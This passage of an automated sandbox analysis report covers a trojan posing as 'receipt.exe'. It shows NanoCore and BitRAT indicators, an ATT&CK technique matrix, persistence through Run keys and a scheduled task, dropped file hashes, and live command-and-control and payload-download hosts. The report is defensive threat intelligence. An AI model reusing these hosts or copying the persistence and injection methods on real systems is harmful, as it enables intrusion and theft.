            Source: receipt.exe, 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: Yara matchFile source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            PowerShell
            11
            Registry Run Keys / Startup Folder
            112
            Process Injection
            11
            Masquerading
            OS Credential Dumping11
            Security Software Discovery
            Remote Services12
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Registry Run Keys / Startup Folder
            1
            Disable or Modify Tools
            LSASS Memory2
            Process Discovery
            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Remote Access Software
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
            Virtualization/Sandbox Evasion
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
            Ingress Tool Transfer
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)112
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Remote System Discovery
            SSHKeyloggingData Transfer Size Limits122
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common2
            Obfuscated Files or Information
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items13
            Software Packing
            DCSync12
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 712166 Sample: receipt.exe Startdate: 29/09/2022 Architecture: WINDOWS Score: 100 68 uzu.duckdns.org 2->68 76 Malicious sample detected (through community Yara rule) 2->76 78 Antivirus detection for dropped file 2->78 80 Antivirus / Scanner detection for submitted sample 2->80 82 11 other signatures 2->82 9 receipt.exe 1 7 2->9         started        13 Uewizrlgm.exe 4 2->13         started        15 Uewizrlgm.exe 3 2->15         started        signatures3 process4 file5 60 C:\Users\user\AppData\...\Uewizrlgm.exe, PE32 9->60 dropped 62 C:\Users\...\Uewizrlgm.exe:Zone.Identifier, ASCII 9->62 dropped 64 C:\Users\user\AppData\...\receipt.exe.log, ASCII 9->64 dropped 86 Encrypted powershell cmdline option found 9->86 88 Creates multiple autostart registry keys 9->88 90 Injects a PE file into a foreign processes 9->90 17 receipt.exe 1 7 9->17         started        21 powershell.exe 16 9->21         started        23 receipt.exe 9->23         started        92 Antivirus detection for dropped file 13->92 94 Machine Learning detection for dropped file 13->94 25 powershell.exe 13->25         started        27 Uewizrlgm.exe 13->27         started        29 powershell.exe 15->29         started        31 Uewizrlgm.exe 15->31         started        signatures6 process7 file8 50 C:\Users\user\AppData\...\Cfrstztdf.exe, PE32 17->50 dropped 52 C:\Users\user\AppData\...\Rzqhcgbd1time.exe, PE32 17->52 dropped 54 C:\Users\...\Cfrstztdf.exe:Zone.Identifier, ASCII 17->54 dropped 70 Encrypted powershell cmdline option found 17->70 72 Creates multiple autostart registry keys 17->72 74 Injects a PE file into a foreign processes 17->74 33 Rzqhcgbd1time.exe 17->33         started        38 powershell.exe 13 17->38         started        40 receipt.exe 17->40         started        42 conhost.exe 21->42         started        44 conhost.exe 25->44         started        46 conhost.exe 29->46         started        signatures9 process10 dnsIp11 66 servproviders.com.br 192.185.215.87, 49685, 80 UNIFIEDLAYER-AS-1US United States 33->66 56 C:\Users\user\...\uIyibZtq20fMk9Yx.exe, PE32 33->56 dropped 58 C:\Users\user\AppData\Local\...\time[1].exe, PE32 33->58 dropped 84 Antivirus detection for dropped file 33->84 48 conhost.exe 38->48         started        file12 signatures13 process14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            receipt.exe100%AviraHEUR/AGEN.1231952
            receipt.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe100%AviraADWARE/FileFinder.Gen7
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe100%AviraTR/Redcap.cskpb
            C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe100%AviraHEUR/AGEN.1231952
            C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe100%AviraTR/Redcap.cskpb
            C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exe100%AviraHEUR/AGEN.1231952
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLinkDownload
            25.0.Rzqhcgbd1time.exe.2b0000.0.unpack100%AviraHEUR/AGEN.1213025Download File
            12.0.receipt.exe.400000.0.unpack100%AviraHEUR/AGEN.1231953Download File
            26.0.receipt.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            SourceDetectionScannerLabelLink
            servproviders.com.br0%VirustotalBrowse
            uzu.duckdns.org3%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://james.newtonking.com/projects/json0%URL Reputationsafe
            http://servproviders.com.br/time.exe0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            servproviders.com.br
            192.185.215.87
            truefalseunknown
            uzu.duckdns.org
            192.169.69.25
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://servproviders.com.br/time.exefalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://www.newtonsoft.com/jsonreceipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://www.nuget.org/packages/Newtonsoft.Json.Bsonreceipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://api.telegram.org/botreceipt.exe, 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.548032095.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.489168945.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.486429428.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.514450713.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.545604366.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.595827301.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.605315953.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000018.00000002.598901171.00000000033D0000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namereceipt.exe, 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://james.newtonking.com/projects/jsonUewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://curl.haxx.se/docs/http-cookies.htmltime[1].exe.25.drfalse
                      high
                      https://www.newtonsoft.com/jsonschemaUewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.openssl.org/Htime[1].exe.25.drfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          192.185.215.87
                          servproviders.com.brUnited States
                          46606UNIFIEDLAYER-AS-1USfalse
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:712166
                          Start date and time:2022-09-29 00:51:15 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 12m 28s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:receipt.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:27
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@27/22@4/1
                          EGA Information:
                          • Successful, ratio: 50%
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com
                          • Execution Graph export aborted for target receipt.exe, PID 4184 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          00:52:27API Interceptor142x Sleep call for process: powershell.exe modified
                          00:52:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Uewizrlgm "C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe"
                          00:53:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Uewizrlgm "C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe"
                          00:54:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cfrstztdf "C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exe"
                          00:54:19API Interceptor188x Sleep call for process: receipt.exe modified
                          00:54:20Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\Desktop\receipt.exe" s>$(Arg0)
                          00:54:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cfrstztdf "C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exe"
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1039
                          Entropy (8bit):5.3436815157474165
                          Encrypted:false
                          SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhyE4KdE4KBLWE4K5AE4Kzr7a:MxHKXwYHKhQnoyHKdHKBqHK5AHKzva
                          MD5:6C24176D343957C767AA6536571797FA
                          SHA1:64512F67A49AF75E9A67474DF54FCCD3472905B2
                          SHA-256:63AB82B5B458425DB1E0831E1BB8CA642C602D9BCB0762A1E47C7836CACF3350
                          SHA-512:D0DFB30B723CC1F0ADB8D9448220AC67A1A21243499B7EB31402CAA0CE9F6A892073E10C52D132E59BF2321F05DBB0973B7E1026023992FC33DE5AB74A6979A4
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b880
                          Process:C:\Users\user\Desktop\receipt.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):1039
                          Entropy (8bit):5.3436815157474165
                          Encrypted:false
                          SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhyE4KdE4KBLWE4K5AE4Kzr7a:MxHKXwYHKhQnoyHKdHKBqHK5AHKzva
                          MD5:6C24176D343957C767AA6536571797FA
                          SHA1:64512F67A49AF75E9A67474DF54FCCD3472905B2
                          SHA-256:63AB82B5B458425DB1E0831E1BB8CA642C602D9BCB0762A1E47C7836CACF3350
                          SHA-512:D0DFB30B723CC1F0ADB8D9448220AC67A1A21243499B7EB31402CAA0CE9F6A892073E10C52D132E59BF2321F05DBB0973B7E1026023992FC33DE5AB74A6979A4
                          Malicious:true
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b880
                          Process:C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):8177152
                          Entropy (8bit):7.173330086107205
                          Encrypted:false
                          SSDEEP:196608:LIRcbH4jSteTGvDxwhzav1yo31CPwDv3uFZjeg2EeJUO9WLQkDxtw3iFFrS6XOfA:LdHsfuDxwZ6v1CPwDv3uFteg2EeJUO9E
                          MD5:A9F5E3E4DF4ED31CB7FB95068D4C240B
                          SHA1:F40E523B5FC1703FCA65F069BAF6CD991A4DCF23
                          SHA-256:03AA67A1CB5896C377E33A6D71FEEDF90088A823E895B35EE651A159A4DC8316
                          SHA-512:791F17B8F6E60BC86E637697BFEFB4694769D6A43882686BD663D64D37F97C1929D54F4C445803662D02E387280D70BE6F870025AC74827E074E8658B6E3EC7A
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, Author: Joe Security
                          • Rule: MALWARE_Win_BitRAT, Description: Detects BitRAT RAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........e.............h.......h..y....h...... T.............).......).......).......c......c......c...............[.......c..................;...)...4...,.....).......Rich............................PE..L......`..................-...N.....R.(...........@...........................}..............................................8.(.....:.(.@..................0{..J............................4......2.@...................\.8......................text...=.-.......-................. ..`.rdata..f.............-.............@..@.data.........8.."....8.............@....gfids.......`:.......9.............@..@.tls..........:.......9.............@....rsrc...(.@...:...@...9.............@..@.reloc...J...0{..L...zz.............@..B................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):5829
                          Entropy (8bit):4.8968676994158
                          Encrypted:false
                          SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                          MD5:36DE9155D6C265A1DE62A448F3B5B66E
                          SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                          SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                          SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                          Malicious:false
                          Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):15668
                          Entropy (8bit):5.539435918332483
                          Encrypted:false
                          SSDEEP:384:Qte/3IpC8Jy0/+clSBxn+ulPbsFvI1Xs4ouYP:T8g44x+ulQCiFP
                          MD5:99993A7F5CB725F4E78281EF771CC93E
                          SHA1:837B1F69FD492ACA0C2748F194AAD31BE87BB281
                          SHA-256:AB2717455A99EFE615B0CE7FB797CB6B38AB8F4DD955F291CFC8E9F0ACA069D1
                          SHA-512:EE899019BC521AAED459CCFE13F2CE6264ECE748CC565418F6D6F670C192A65B126845462027FFBB77127B83F1B05EFD946031469A84BE18359DEA2212F3A698
                          Malicious:false
                          Preview:@...e...........6.........L.....................................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                          Process:C:\Users\user\Desktop\receipt.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):236032
                          Entropy (8bit):6.5323035265552685
                          Encrypted:false
                          SSDEEP:3072:KUcvuJEXStOjA7BpQC2mCLsTRozN4rMtH02BhAAH7TNd3XxfyEAg0FujoBL1Vwso:omjtOEKKo0MtUEjwEAOgwHes
                          MD5:75C8427471203E42A905F099D986BAE4
                          SHA1:0516E741687AB1F9D10AA65AE27295DA3583881E
                          SHA-256:176A5367D9746B3B7C35AAEB04B905007F59EDFF29BC3790345864F13F54A045
                          SHA-512:D4C34E343E3D959DCF8386F1B25FFC4C2B1E7A69C4B9B19D9026EBFBDC7A6DCD7B4369323005E18A00929E9293A89163009E72011368D18FA3BE16D6194907B6
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z/...Nf}.Nf}.Nf}..}.Nf}..}.Nf}..}.Nf}%.e|.Nf}%.c|"Nf}%.b|<Nf}..c|.Nf}..}.Nf}.Ng}mNf}..o|.Nf}..d|.Nf}Rich.Nf}................PE..L...$.0_.................V...P...............p....@.......................................@.................................,h..x...............................\&...9..8....................:.......9..@............p...............................text...{U.......V.................. ..`.rdata.......p.......Z..............@..@.data................\..............@....gfids...............l..............@..@.tls.................p..............@....reloc..\&.......(...r..............@..B................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
